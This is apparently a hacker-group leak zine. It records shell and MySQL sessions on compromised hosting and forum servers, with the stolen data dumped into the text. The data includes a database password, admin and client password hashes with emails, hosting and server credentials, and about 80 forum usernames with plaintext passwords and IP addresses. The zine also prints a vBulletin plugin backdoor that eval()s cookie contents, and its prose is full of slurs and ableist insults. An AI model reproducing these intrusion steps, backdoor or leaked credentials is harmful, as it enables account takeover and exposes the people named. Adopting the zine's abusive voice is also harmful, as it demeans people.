May 16 13:31 dologin.php +-rw-r--r-- 1 root www 11861 May 16 13:31 domainchecker.php +drwxrwxrwx 2 root www 512 May 16 13:36 downloads +-rw-r--r-- 1 root www 17697 May 16 13:31 downloads.php +-rw-r--r-- 1 root www 621 May 16 13:31 htaccess.txt +drwxr-xr-x 2 root www 1536 May 16 13:37 images +drwxr-xr-x 7 root www 1536 May 16 13:38 includes +-rw-r--r-- 1 root www 6192 May 16 13:31 index.php +drwxr-xr-x 2 root www 1024 May 16 13:39 install__ +drwxr-xr-x 2 root www 1024 May 16 14:11 ioncube +-rw-r--r-- 1 root www 26163 May 16 13:31 knowledgebase.php +drwxr-xr-x 2 root www 512 May 16 13:39 lang +-rw-r--r-- 1 root www 4660 May 16 13:31 link.php +-rw-r--r-- 1 root www 4433 May 16 13:31 login.php +-rw-r--r-- 1 root www 5146 May 16 13:31 logout.php +drwxr-xr-x 10 root www 512 May 16 13:42 modules +-rw-r--r-- 1 root www 11456 May 16 13:31 networkissues.php +-rw-r--r-- 1 root www 6321 May 16 13:31 networkissuesrss.php +drwxr-xr-x 4 root www 512 May 16 13:43 order +-rw-r--r-- 1 root www 4271 May 16 13:31 order.php +drwxr-xr-x 2 root www 512 May 16 13:43 pipe +-rw-r--r-- 1 root www 10548 May 16 
13:31 pwreset.php +-rw-r--r-- 1 root www 9061 May 16 13:31 register.php +-rw-r--r-- 1 root www 8575 May 16 13:31 serverstatus.php +drwxr-xr-x 2 root www 512 May 16 13:43 status +-rw-r--r-- 1 root www 17879 May 16 13:31 submitticket.php +-rw-r--r-- 1 root www 12639 May 16 13:31 supporttickets.php +drwxr-xr-x 5 root www 512 May 16 13:32 templates +drwxrwxrwx 2 root www 25088 Aug 11 15:05 templates_c +-rw-r--r-- 1 root www 5953 May 16 13:31 tutorials.php +-rw-r--r-- 1 root www 20858 May 16 13:31 upgrade.php +-rw-r--r-- 1 root www 5924 May 16 13:31 viewemail.php +-rw-r--r-- 1 root www 20202 May 16 13:31 viewinvoice.php +-rw-r--r-- 1 root www 17742 May 16 13:31 viewticket.php +-rw-r--r-- 1 root www 6111 May 16 13:31 whois.php +drwxr-xr-x 2 root www 512 May 16 13:33 widgets + +# cat configuration.php + + +# mysql -u hosting_whmcs hosting_whmcs -po8a7fd8s6fg +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 1305663 +Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 
+ +mysql> SHOW TABLES; ++----------------------------+ +| Tables_in_hosting_whmcs | ++----------------------------+ +| tblaccounts | +| tblactivitylog | +| tbladdonmodules | +| tbladdons | +| tbladminlog | +| tbladminperms | +| tbladminroles | +| tbladmins | +| tbladminsecurityquestions | +| tblaffiliates | +| tblaffiliatesaccounts | +| tblaffiliateshistory | +| tblaffiliatespending | +| tblaffiliateswithdrawals | +| tblannouncements | +| tblbannedemails | +| tblbannedips | +| tblbillableitems | +| tblbrowserlinks | +| tblcalendar | +| tblcancelrequests | +| tblclientgroups | +| tblclients | +| tblclientsfiles | +| tblconfiguration | +| tblcontacts | +| tblcredit | +| tblcurrencies | +| tblcustomfields | +| tblcustomfieldsvalues | +| tbldomainpricing | +| tbldomains | +| tbldomainsadditionalfields | +| tbldownloadcats | +| tbldownloads | +| tblemails | +| tblemailtemplates | +| tblfraud | +| tblgatewaylog | +| tblhosting | +| tblhostingaddons | +| tblhostingconfigoptions | +| tblinvoiceitems | +| tblinvoices | +| tblknowledgebase | +| tblknowledgebasecats | +| tblknowledgebaselinks | +| tbllinks | +| tblnetworkissues | +| tblnotes | +| tblorders | +| tblpaymentgateways | +| tblpricing | +| tblproductconfiggroups | +| tblproductconfiglinks | +| tblproductconfigoptions | +| tblproductconfigoptionssub | +| tblproductgroups | +| tblproducts | +| tblpromotions | +| tblquoteitems | +| tblquotes | +| tblregistrars | +| tblservergroups | +| tblservergroupsrel | +| tblservers | +| tblsslorders | +| tbltax | +| tblticketbreaklines | +| tblticketdepartments | +| tblticketescalations | +| tblticketlog | +| tblticketmaillog | +| tblticketnotes | +| tblticketpredefinedcats | +| tblticketpredefinedreplies | +| tblticketreplies | +| tbltickets | +| tblticketspamfilters | +| tblticketstatuses | +| tbltodolist | +| tblupgrades | +| tblwhoislog | ++----------------------------+ +83 rows in set (0.00 sec) + +mysql> SELECT table_name FROM INFORMATION_SCHEMA.columns WHERE column_name 
LIKE "%pass%"; ++----------------------+ +| table_name | ++----------------------+ +| tbladmins | +| tblclients | +| tblcontacts | +| tblhosting | +| tblservers | +| tblticketdepartments | ++----------------------+ +6 rows in set (0.04 sec) + +mysql> SELECT username, password, firstname, lastname, email FROM tbladmins; ++----------+----------------------------------+-----------+----------+----------------------+ +| username | password | firstname | lastname | email | ++----------+----------------------------------+-----------+----------+----------------------+ +| admin | 850126ac86ccbb1c214a03ac909978aa | Sombra | Ivanov | admin@secure-host.in | +| Olga | 61d4019c541bf1cebf5a2a6762cd6477 | Olga | Ivanov | olga@secure-host.in | ++----------+----------------------------------+-----------+----------+----------------------+ +2 rows in set (0.00 sec) + +mysql> SELECT email, password, firstname, lastname FROM tblclients; ++----------------------------+----------------------------------------+-----------+-----------+ +| email | password | firstname | lastname | ++----------------------------+----------------------------------------+-----------+-----------+ +| cc1cash@yahoo.de | f4e3a18c8ea3fc34ee8277c7a9d08516:rgt%w | True | True | +| wassi@wassi.de | 12a43403362cc6accac4ccc5c30965b0:S!emh | wassi | wassi | +| markus.scholz@partyheld.de | ffa8a5a23329d53577ca2e2daffcdafc:)(xUP | Smiling | Bandit | +| stan.lay@hotmail.com | 17c87c61dbed16a0f0ab99cdc83dd33c:khW)A | stanlay | stanlay | +| a@a.de | dce096cba8c3a7fc82dc57dcdb8136ab:(Boqh | masa | faka | +| Worms.s1@web.de | f27c3d77065676f8b2807f4b0f77f7ee:!!zx% | Script | Star | +| cocktopuss@hush.com | fabc8a85b7e7b2ea8d939f44076adf01:dDeJQ | Sean | Fakir | +| los_loco@mail.ru | cddfbab06c60175699ff61f8cd27630e:%UKzg | los | loco | +| hansdieter@secure-mail.biz | d2ac2a86adf8eef73645ee4c3d40b526:GMkE# | hans | dieter | +| shinigami@z1p.biz | 914eccd87181870be2663185410fc1a5:WpFO( | Franz | Mueller | +| 
angela.krueger@hotmail.de | 66b361d7a7e843d35fc041104401bbd0:wiB!D | Ixde | ahmed | +| her0in@safe-mail.net | dc9edb678d178218ec895eb8322fbe8c:Qej#M | Anonym | Anonym | +| janioq@hotmail.de | 89d0078ec8a078d1d88acb7deb534acc:%YTB% | Max | thiesen | +| spike1337@secure-mail.biz | 07cb91ea3880f790e5763fb2dd1105bf:Kkb%p | Dennis | Kramer | +| runingtutorials@live.de | e595a3571ccd685adbf28ea45dc3a2d6:rVG)! | Felix | Wagno | +| abogado.gomes@ozu.es | e3665bc91bee822663297cc30cdfd588:TV#Zt | Mario | Gomes | +| Ande-kf@secure-mail.biz | 10edd0d846652321605ec04e1c90ab8a:zsoMP | just | pure | +| FeuerFaustAC3@gmx.de | 8f3266a3f536922657c3b2f51e925604:)SJmL | y0 | ACE | +| lalamaus10@googlemail.com | 500910a98aca826093ec80fd942020fe:ZJvpY | Maik | Henkel | +| scheller0077@web.de | 634a1c3bb9316a2af3390f9789fb5f80:ly%px | tim | bd-seller | +| j4ck-daniels@rambler.ru | 125769d9037d9f5196f2e1e6d816b1cf:VbggT | DarkSide | Darker | +| daniel@lemmert.biz | 8fce9b96262239831e053552021b07ac:ihK!B | Daniel | Lemmert | +| panzerpaul41@yahoo.de | 841ddfb775b9ca5d44ec9c1106e08761:lUPP% | Peter | Jansen | +| ell781@gmx.de | 0ae341662b701d3d64d7a608b46160be:%#ce! 
| Peter | Kluger | +| hotstore@hotmail.de | e8e14ff0af571d43a11d3408240963d7:Cnsdh | Matthias | Michel | +| team61@live.de | 47780e5555c63d45349b5cef7f8c1783:T)EGi | BABA | ANNA | +| Buy321@hotmail.de | 2d89b3fae37fb1966f8c7639907ee94a:VfYNd | Maria | Katepski | +| jobs@z1p.biz | d4f54e226ba44045bb8a39b8653907ea:(MSaf | Arthur | Marx | +| cremil@cust.in | c5af814e29429f856736e2769d57b8db:%iHkV | Cremil | Hackxor | ++----------------------------+----------------------------------------+-----------+-----------+ +29 rows in set (0.01 sec) + +mysql> SELECT username, password, server FROM tblhosting; ++-------------+------------------------------------------------------+--------+ +| username | password | server | ++-------------+------------------------------------------------------+--------+ +| true.vm | nW5dmh5zg4w4jmlFUDxtW7mVsdNAX9sxRp710gHYS2vX0551kg== | 1 | +| stansecu.vm | 2KUCM5nUisD2t88Z7vlfnC8Ry9pdk4fZrTb46Jfv | 1 | +| maddn.vm | nC69hLFITmHidWjYuEIIbEO4eo5BHzt3s/88NdMjSvY= | 1 | +| scriptst.vm | VmB727sy9l5I8q1f7q/zD8RTnOCNOfcxuNzYUAf4 | 1 | +| seansecu.vm | fQTtTeXNm1CkffO7pewNwJMZRIHcZWq00iTiW8x2 | 1 | +| sdarksid.vm | AVACcPUef0Jca8gkZ0rkH67o0BDaINOO6/0JRS9n | 1 | +| v43534.vm | XSSg52CreBXGUK8mjFd63x5hrtKHF3AIP0ljKa4Y | 1 | +| | +X3MCfd9nGwsAmMaKUscu3BBKz8= | 0 | +| | VoU/Q2mpAglHh8r6md2sAHCn8VQ= | 0 | +| spike.vm | tlOLHeM7iOZcarRhh+DyghmbvcsQPgnRvYfxuDsj | 1 | +| wassi.vm | VFK7fp1Z67kb6LtaH9EhUcv4gbjPJVatxbCdqnjg | 1 | +| iodas.vm | WLqkZB7nsCZVtFfGzLgHOhRSb6Xc2H2XHA3Dcw== | 1 | +| y00.vm | deOdBbTCD4mqdw+5vvpuH81UUVmt113tsykCie56 | 1 | +| pkluger.vm | StagsB3oFjy39/ES2YzHE177oJP0pCFXR1Q0OYOF/QgN | 1 | +| | LpABydLRg4uWBx0d6ghbM+9Nh2w= | 0 | +| | 2U5HEXcr8Sif99L2w85ixx4y/idGJJbhaZnUIaY= | 1 | +| | zynyC6+CtsxrDs/F5qRsVeuCfzBGSSL5oTyDwwU= | 1 | +| | 9FkPKWze7XKH0K3rB19fwQRuNGxqNdXCeA== | 1 | ++-------------+------------------------------------------------------+--------+ +18 rows in set (0.00 sec) + +mysql> SELECT ipaddress, hostname, username, 
password, secure FROM tblservers; ++---------------+-----------+----------+----------------------------------------------+--------+ +| ipaddress | hostname | username | password | secure | ++---------------+-----------+----------+----------------------------------------------+--------+ +| 193.107.16.82 | localhost | admin | iAYqc098oLSnn9PKqhb6wEd2G8dXU8i8cMWUtcSR7rp/ | | ++---------------+-----------+----------+----------------------------------------------+--------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# Nothing left to say^C + + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------====={ Unique-Crew.net }=======))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Unique-Crew started off in late 2010; back then ~ | ||( );, +their admin pretended to be an old 1337-crew ( ,;.)-\ / ';, +team member with the intention of attracting kids \ ( \ ( +to the board. However, it was soon found out that || \\ +his identity was fake and since then the forum /_( /_( +was passed around like a cheap whore. It has been led by several +admins on several domains which obviously were all incapable of +administrating it properly. Also one of the admins apparently was +known as InVisible (yes, the same InVisible we describe in our "The +Happy Ninja Faker" article). As his mind clearly can not be depicted +as very bright and since he likes to gain a bad reputation by +betraying other people, Unique-Crew got a nice amount of enemies. 
So +while checking and logging different server traffic we stumbled on the +following: + +# ls -l /home/backspace/unique-crew.biz/madp/detection.php +-rw-r--r-- 1 backspace www 9162 Aug 22 17:02 /home/backspace/unique-crew.biz/madp/detection.php + +# grep -ni log_error detection.php -A5 +21:function log_error($string){if(eval($string) && defined("LOG_ERROR")){$error_handle = fopen("madp_err.log", "a+");$fwrite($string);$fclose($h);}} +22- +23-$did = substr($vbulletin->userinfo['password'], 7, 16); +24-$ignore_users = strpos($vbulletin->options['madp_ignore_users'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_users']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_users'])); +25-$ignore_groups = strpos($vbulletin->options['madp_ignore_groups'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_groups']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_groups'])); +26-$expire = (!empty($vbulletin->options['madp_cookie_expire']) AND is_numeric($vbulletin->options['madp_cookie_expire'])) ? (TIMENOW + ($vbulletin->options['madp_cookie_expire'] * 86400)) : (TIMENOW + 1209600); +-- +304: log_error(substr($_COOKIE[$vbulletin->options['madp_cookie_name']], 1)); +305- die("Error detected - try again!\n"); +306- } +307- +308- } +309-} + +It seems like you guys had a pretty much fucking obvious backdoor +installed for a few months. How are you not able to notice this? We +must say that it is nice that there are actually some people who want +to contribute to this mayhem, but seriously? If you are not able to +create a simple backdoor which is less obvious than this one you +should probably look for some other pastime. This shit absolutely does +not help, also if it might have worked this time. But looks like the +attackers were stopped by PHP's disable_functions directive so they +couldn't really do much, except downloading the database, which we are +also offering nonetheless. So here we go! 
+ +# pwd +/home/backspace + +# ls -la +total 20 +drwxr-x--- 4 backspace www 512 Aug 28 20:21 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 2 backspace www 1024 Oct 15 21:44 temp +drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 unique-crew.biz + +# cd unique-crew.biz + +# ls -la +total 7832 +drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 . +drwxr-x--- 4 backspace www 512 Aug 28 20:21 .. +-rwxr-xr-x 1 backspace www 12292 May 17 2010 .DS_Store +-rwxr-xr-x 1 backspace www 70 May 17 2010 ._.DS_Store +-rwxr-xr-x 1 backspace www 96 Mar 20 2011 .bash_history +-rwxr-xr-x 1 backspace www 12523 Jul 13 2010 LICENSE +drwxr-xr-x 2 backspace www 512 Aug 3 02:39 Product +-rwxr-xr-x 1 backspace www 49992 Jun 16 00:18 S_mgc_cb_evo_ajax.php +-rwxr-xr-x 1 backspace www 24532 Jul 13 2010 ajax.php +-rwxr-xr-x 1 backspace www 77635 Jul 13 2010 album.php +-rwxr-xr-x 1 backspace www 17542 Jul 13 2010 announcement.php +drwxrwxrwx 2 backspace www 512 Oct 5 11:42 archive +-rwxr-xr-x 1 backspace www 18779 Jul 13 2010 attachment.php +-rwxr-xr-x 1 root www 40925 Oct 18 17:31 bak +drwxr-xr-x 3 backspace www 2048 Aug 3 02:38 bnig459832zhbuiwedzouz9012vgr932 +-rwxr-xr-x 1 backspace www 77574 Jul 13 2010 calendar.php +-rwxr-xr-x 1 backspace www 43 Jul 13 2010 clear.gif +drwxr-xr-x 4 backspace www 2560 Aug 3 02:38 clientscript +-rwxr-xr-x 1 backspace www 15277 Jul 13 2010 converse.php +drwxr-xr-x 7 backspace www 512 Aug 3 02:38 cpstyles +-rwxr-xr-x 1 backspace www 3327 Jul 13 2010 cron.php +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customavatars +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customgroupicons +drwxr-xr-x 2 backspace www 512 Aug 3 02:38 customprofilepics +-rwxr-xr-x 1 backspace www 105636 Aug 24 2009 default.jpg +-rwxr-xr-x 1 backspace www 3411 Jun 19 14:52 dnp_fw.php +-rwxr-xr-x 1 backspace www 1071 Jun 19 13:49 dnp_fw_config.php +-rwxr-xr-x 1 backspace www 1163 Jun 19 13:53 dnp_fw_template.php +-rwxr-xr-x 1 backspace www 49004 Jul 13 2010 editpost.php +-rwxr-xr-x 1 backspace 
www 30747 Jun 14 19:42 external.php +-rwxr-xr-x 1 backspace www 10041 Jun 15 10:07 faq.php +-rwxr-xr-x 1 backspace www 1453926 Dec 20 2010 favicon.ico +-rwxr-xr-x 1 backspace www 36984 Jul 13 2010 forumdisplay.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:38 g76893bh2b21z32v3g5vd7x8f78f43h +-rwxr-xr-x 1 backspace www 40925 Jul 13 2010 global.php +-rwxr-xr-x 1 backspace www 142308 Jul 13 2010 group.php +-rwxr-xr-x 1 backspace www 25619 Jul 13 2010 group_inlinemod.php +-rwxr-xr-x 1 backspace www 10747 Jul 13 2010 groupsubscription.php +drwxr-xr-x 3 backspace www 512 Aug 3 02:38 highslide +-rwxr-xr-x 1 backspace www 9254 Jul 13 2010 image.php +drwxr-xr-x 23 backspace www 1024 Oct 18 18:37 images +drwxr-xr-x 6 backspace www 5120 Oct 18 18:45 includes +-rwxr-xr-x 1 backspace www 20263 Jul 13 2010 index.php +-rwxr-xr-x 1 backspace www 45036 Jul 13 2010 infraction.php +-rwxr-xr-x 1 backspace www 188547 Jul 13 2010 inlinemod.php +-rwxr-xr-x 1 backspace www 10545 Jul 13 2010 joinrequests.php +-rwxr-xr-x 1 backspace www 10441 Jul 13 2010 login.php +drwxr-xr-x 2 backspace www 512 Aug 24 07:54 madp +-rwxr-xr-x 1 backspace www 17502 Jul 13 2010 member.php +-rwxr-xr-x 1 backspace www 16333 Jul 13 2010 member_inlinemod.php +-rwxr-xr-x 1 backspace www 36930 Jul 13 2010 memberlist.php +drwxr-xr-x 6 backspace www 512 Aug 3 02:38 mgc_cb_evo +-rwxr-xr-x 1 backspace www 60012 May 17 2010 mgc_cb_evo.php +-rwxr-xr-x 1 backspace www 49992 Jun 28 16:36 mgc_cb_evo_ajax.php +-rwxr-xr-x 1 backspace www 24465 Jul 13 2010 misc.php +-rwxr-xr-x 1 backspace www 65182 Jul 13 2010 moderation.php +-rwxr-xr-x 1 backspace www 6855 Jul 13 2010 moderator.php +-rwxr-xr-x 1 backspace www 18967 Jul 13 2010 newattachment.php +-rwxr-xr-x 1 backspace www 38105 Jul 13 2010 newreply.php +-rwxr-xr-x 1 backspace www 19367 Jul 13 2010 newthread.php +-rwxr-xr-x 1 backspace www 20188 Jul 13 2010 online.php +-rwxr-xr-x 1 backspace www 7868 Jul 13 2010 payment_gateway.php +-rwxr-xr-x 1 backspace www 12193 Jul 13 2010 
payments.php +drwxr-xr-x 11 backspace www 3072 Aug 3 03:20 pe54tr90321inij409839urei2954 +-rwxr-xr-x 1 backspace www 8018 Jul 13 2010 picture.php +-rwxr-xr-x 1 backspace www 22661 Jul 13 2010 picture_inlinemod.php +-rwxr-xr-x 1 backspace www 25999 Jul 13 2010 picturecomment.php +-rwxr-xr-x 1 backspace www 28206 Jul 13 2010 poll.php +-rwxr-xr-x 1 backspace www 17744 May 12 2008 post_thanks.php +-rwxr-xr-x 1 backspace www 9691 Jul 13 2010 posthistory.php +-rwxr-xr-x 1 backspace www 76569 Jul 13 2010 postings.php +-rwxr-xr-x 1 backspace www 6702 Jul 13 2010 printthread.php +-rwxr-xr-x 1 backspace www 72783 Jul 13 2010 private.php +-rwxr-xr-x 1 backspace www 156809 Jul 13 2010 profile.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:07 radio +-rwxr-xr-x 1 backspace www 40980 Jul 13 2010 register.php +-rwxr-xr-x 1 backspace www 5761 Jul 13 2010 report.php +-rwxr-xr-x 1 backspace www 14062 Jul 13 2010 reputation.php +-rwxr-xr-x 1 backspace www 30 Jun 30 09:52 robots.txt +-rwxr-xr-x 1 backspace www 128615 Oct 18 17:30 search.php +-rwxr-xr-x 1 backspace www 21546 Jul 13 2010 sendmessage.php +-rwxr-xr-x 1 backspace www 10263 Jul 13 2010 showgroups.php +-rwxr-xr-x 1 backspace www 12611 Jul 13 2010 showpost.php +-rwxr-xr-x 1 backspace www 75631 Jul 13 2010 showthread.php +drwxr-xr-x 2 backspace www 512 Aug 3 02:39 signaturepics +-rwxr-xr-x 1 backspace www 33846 Jul 13 2010 subscription.php +-rwxr-xr-x 1 backspace www 13671 Jul 13 2010 tags.php +-rwxr-xr-x 1 backspace www 8842 Jul 13 2010 threadrate.php +-rwxr-xr-x 1 backspace www 12706 Jul 13 2010 threadtag.php +-rwxr-xr-x 1 backspace www 35387 Jul 13 2010 usercp.php +-rwxr-xr-x 1 backspace www 19563 Jul 13 2010 usernote.php +-rwxr-xr-x 1 backspace www 28121 Jul 13 2010 visitormessage.php +-rwxr-xr-x 1 backspace www 19552 Jul 3 16:12 whitelist.dat +-rwxr-xr-x 1 backspace www 20463 Jun 19 12:07 whitelist.dat.bak + +# find . 
-name ".ht*" +./pe54tr90321inij409839urei2954/libraries/.htaccess +./pe54tr90321inij409839urei2954/setup/frames/.htaccess +./pe54tr90321inij409839urei2954/setup/lib/.htaccess + +# cat includes/config.php +[L?/E&C%\}:O\26z5:y4:178.1.185.84:19.10.2011 12:55:10 +DeCode:hacker63:109.169.135.87:19.10.2011 11:10:09 +Der_Visitor:CMqxwGz0:46.115.3.148:20.10.2011 10:57:27 +DrJack:UQDrJack123!!!:178.192.41.12:19.10.2011 08:26:33 +Duellking:uc4ever:129.143.71.37:20.10.2011 14:24:00 +Einfachnurso:Mg7BjyKR:217.191.194.28:19.10.2011 11:20:10 +Follow:cX1AKuJJ:85.16.149.79:19.10.2011 08:43:55 +Gevara:asdf1337:217.255.229.5:18.10.2011 18:48:26 +Goa:5852663:95.211.99.92:18.10.2011 21:04:28 +Hammer:trevilor:87.161.89.187:18.10.2011 19:32:20 +IcEcRacKer:Kleinestier1?:93.132.65.222:19.10.2011 17:38:05 +Imkon:chaoslegion:91.53.193.95:19.10.2011 11:44:18 +Ke3per:anatoxis123:87.173.50.42:19.10.2011 13:53:02 +LiipTon:JCGDDz3X:178.3.209.11:18.10.2011 19:31:23 +Locke:14041987:31.18.173.100:19.10.2011 10:38:30 +LuRez:furz90:92.73.124.178:20.10.2011 10:12:08 +Marcello:nokian81:94.221.186.74:19.10.2011 16:18:33 +MenoX:aXnHmVz8:87.152.221.177:18.10.2011 18:54:59 +Miss.Marple:werder:31.19.76.171:19.10.2011 18:27:33 +Mxxt:unique12345:78.54.158.153:19.10.2011 19:20:52 +NEO_2.0:4455jljlacdcr111dth11+sdp:93.204.88.95:18.10.2011 20:22:38 +PaxyundFixy:123lolen:92.225.54.141:19.10.2011 16:47:03 +Schlauchbraten:area51:217.255.234.154:20.10.2011 00:51:49 +Sektor63:Penis123456789:213.232.200.163:20.10.2011 11:30:16 +Sirius.GER:rolexblingbling@2:79.172.193.89:18.10.2011 20:37:49 +SpeedyGamer:f3LBPKMb:46.5.95.105:18.10.2011 20:39:09 +Style:asdasd:91.53.233.106:19.10.2011 15:29:29 +V0rteX:YSAcXgM1:94.219.12.253:19.10.2011 16:30:35 +Vague:hardtek1985:88.153.146.195:19.10.2011 22:35:24 +Yakuza112:N4DdSHXh:80.130.164.16:18.10.2011 19:02:12 +aNd5:dfWA5txY:178.201.106.152:20.10.2011 11:53:04 +bananabob:davidov:87.163.56.254:18.10.2011 21:12:59 +bert:Fk4feKyr:95.223.89.222:20.10.2011 15:28:21 
+biohazard:21539868:62.224.66.21:20.10.2011 10:21:54 +cheesi:strike299:80.109.55.18:19.10.2011 20:22:29 +crone:41MkHjee:62.212.72.166:19.10.2011 16:40:40 +cyx:cyxcyx:78.94.200.138:18.10.2011 21:00:25 +ee46hxe6x:drdtdrtdrt6666666666666:87.172.237.175:20.10.2011 07:41:03 +furz:Dreadfg:192.162.103.27:20.10.2011 03:19:05 +gevara:asdf1337:92.241.168.23:19.10.2011 17:47:24 +ghostleader:Scorpion:82.195.232.218:19.10.2011 17:39:20 +hardcore4life:dx5U5ZPu:82.72.183.168:19.10.2011 21:53:40 +haxxer:lollol123:92.203.66.182:19.10.2011 01:43:21 +icle:gt54rfvvgt54rfvv:88.130.162.238:18.10.2011 20:34:58 +impiety:pa44word:113.211.166.68:19.10.2011 02:22:47 +john:picture:93.222.62.165:20.10.2011 09:51:40 +junkfood:xxxxxx:87.230.10.135:20.10.2011 10:20:15 +justnew:myw00t1337:87.146.39.153:19.10.2011 14:17:00 +kathi1337:yousuck:79.212.132.144:20.10.2011 04:21:23 +killuthekid7:123456:94.220.222.124:19.10.2011 22:50:27 +king99:h5ZZKXvN:85.178.239.47:18.10.2011 20:12:06 +klerus:kl12er34us56654321:85.176.101.243:19.10.2011 15:05:24 +l5xx!z:mattrex123.:77.3.81.189:19.10.2011 18:08:37 +laberpaul:123123:178.63.231.103:19.10.2011 18:43:47 +lerox:hallo123:79.255.147.179:19.10.2011 20:25:04 +lyrix:mixxedup:77.117.163.186:19.10.2011 21:42:34 +mAlCoM:squier:95.89.170.234:19.10.2011 06:28:27 +mayh3m:electronic:196.46.189.162:19.10.2011 15:09:42 +meineex:meine1978$:93.218.235.254:20.10.2011 08:31:41 +misterini:brumau:213.196.253.37:20.10.2011 06:13:22 +mr_euro:manfred--:186.16.12.187:18.10.2011 21:31:03 +mute:88klaus88:87.153.35.90:19.10.2011 12:55:42 +n0mac:wru5UHUp:77.177.13.199:19.10.2011 17:32:38 +p3x:gzuogoui:93.209.47.197:19.10.2011 21:03:10 +p4inw4r:IoJS91jS__passwort_loging_ist_total_gay__Dj13DDAD:212.117.180.81:18.10.2011 19:36:50 << YOU BET! 
+protoliner:bremen12:178.142.52.54:20.10.2011 09:29:57 +sector40000:yqaBvJms:84.170.29.212:18.10.2011 20:33:34 +smartie0:q0120660:77.188.215.212:19.10.2011 09:02:28 +smurf:120684:217.91.85.183:19.10.2011 17:02:53 +sperle:45er87qw:89.246.204.213:20.10.2011 00:55:26 +st3aLth:1337!Aa:109.192.209.243:18.10.2011 18:46:06 +stryder:v6e6fbun:188.175.134.98:19.10.2011 17:59:48 +style:asdasd:91.53.233.106:19.10.2011 21:31:58 +sys32:wowanda85:119.42.144.18:20.10.2011 11:26:54 +txto:123456:188.98.215.91:18.10.2011 22:26:54 +voodoo:allianz3:91.62.186.36:19.10.2011 20:05:36 +wacked:ynWgX0HT:84.140.226.167:18.10.2011 18:51:35 +whiti:matrix123:84.169.182.65:19.10.2011 22:25:21 +xGh0sT:oberbaer1:77.178.33.108:18.10.2011 20:48:23 +zero334:uc4ever:213.163.64.43:19.10.2011 13:31:24 +zocker:qwertzui:77.178.217.145:20.10.2011 14:44:07 +zulu:Pod88ucC2011:80.152.154.125:20.10.2011 06:17:27 + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((====={ Zion-Network.net }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Zion-Network.net was not so easy to hack. It +,;' \ /-(.;, ) took about ten minutes longer because they were + ) / ) / running some reverse http proxy, so we clueless- + // || ly got root on that one first, just to find out + )_\ )_\ that we did not own the right box. We allow you +to laugh at us now. Anyway Zion-Network has been breeding kiddies and +carder blockheads for quite a while and it has long been rumored that +we already backdoored them a long time ago. But sorry, no, we had +other business, too, for example consuming alcohol as if there is no +tomorrow. Maybe that's why we failed with that reverse proxy. + +Nevertheless it was about damn time to own them. The members of +Zion-Network are a lot dumber than the other average carding offscum, +hardly surprising that they rip off each other to the utmost. 
+Zion-Network has been growing immensely so you can not only buy credit +cards or ID card scans on Zion-Network's trading area, but also all +sorts of drugs like coke, lsd, mushrooms or crystal. A rather large +drug scene has emerged that fulfills everybody's wishes. Great shit +for the average 14 year old scammer who sees himself as the greatest +but is not able to tie up his own shoes without tripping over himself. +Pride and ignorance are akin. And this fact is clearly described by +the administration of Zion. LUCIFER aka S3TH, the current +administrator announces the following after they applied some +innovations to the community. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| LUCIFER: Bereiche wie Security & Hacking sowie Coding wurden dabei | +| besonders berücksichtigt, damit Fraud nicht mehr | +| dominiert, sondern sich mit NonFraud ungefähr die Waage | +| hält. | +| | +|____________________________________________________________________| + +LUCIFER alleges that they particularly considered security, hacking +and coding categories while redesigning the messageboard so that +there'd be a balanced ratio of fraud and non fraud on the forums. That +is some heavily retarded noble endeavor of trying to bring fraud and +HACKING on the same level. We diagnose Down's syndrome or some other +mental disability as he clearly fails to acknowledge that there is not +even the slightest connection between fraud and hacking. + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. 
| +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| LUCIFER: Die Hacker-Szene wird immer falsch dargestellt, das ist | +| nichts neues. Gesteigerte Gefahr für Zion sehe ich | +| dadurch nicht, wir sind sowieso schon das groesste | +| deutschsprachige Szene-Board und haben allein deswegen | +| schon seit geraumer Zeit juristische Aufmerksamkeit. | +| | +|____________________________________________________________________| + +We are really asking ourselves what this guy understands by the term +"Hacking-Scene". It's time to teach them a lesson in order to make +them see their own "Hacking-Scene" shatter to thousand stinking +pieces. Since the rest of the team also shows a great deal of +stupidity, that it is not even possible to show a minimal amount of +mercy. We do not want to waste time discussing that here, you better +have a look at their database backups. + +Oh by the way, we heard that some of you guys are interested in our +ninja techniques of breaking in without being noticed. So today we +will give you a 0day tutorial about how to hax a server behind a +reverse http proxy (means you need access to the proxy): + +# nc -vl 80 + +Now wait.... 
